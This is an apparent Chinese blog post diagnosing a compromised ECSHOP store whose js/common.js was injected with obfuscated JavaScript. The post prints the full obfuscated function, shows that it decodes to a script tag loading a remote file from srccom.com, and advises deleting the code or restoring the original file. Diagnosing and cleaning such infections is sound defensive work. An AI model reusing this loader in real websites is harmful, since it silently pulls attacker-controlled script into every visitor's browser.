最近发现一个ECSHOP做的网站,首页以及各个页面打开非常慢。。。经检查发现每次打开页面都在进行长时间的 srccom.com 请求,又经百度了一下,大量ECSHOP及SHOPEX网站被挂此马。
其实是 js/common.js 中被植入了一段恶意JS代码:
1 2 3 4 5 6 7 8 9 10 11 12 | function CurrentXmlFrmFocus() { var arnElement=[2,9,3,8,2,8,7,5,4,3,10,5]; var arsOffset=[" ",":",".","/","<",">","=","'","CRS","MOC","TPIRCS","PTTH"]; var ardPopOpacity=[4,10,0,8,6,7,11,1,3,3,8,9]; var strgAttribute="";ardPopOpacity=ardPopOpacity.concat(arnElement); for(var i=0;i<ardPopOpacity.length;i++) { strgAttribute=strgAttribute+arsOffset[ardPopOpacity[i]].split("").reverse().join(""); } document.writeln(strgAttribute); } CurrentXmlFrmFocus(); |
函数最终会拼接出一段完整的script标签:
1 | <script SRC=’http://srccom.com/SRC.SRC’></script> |
解决办法:
1、删除 common.js 中的这段代码。
2、使用官方原版的 common.js 文件覆盖空间的 common.js 文件。
新闻热点
疑难解答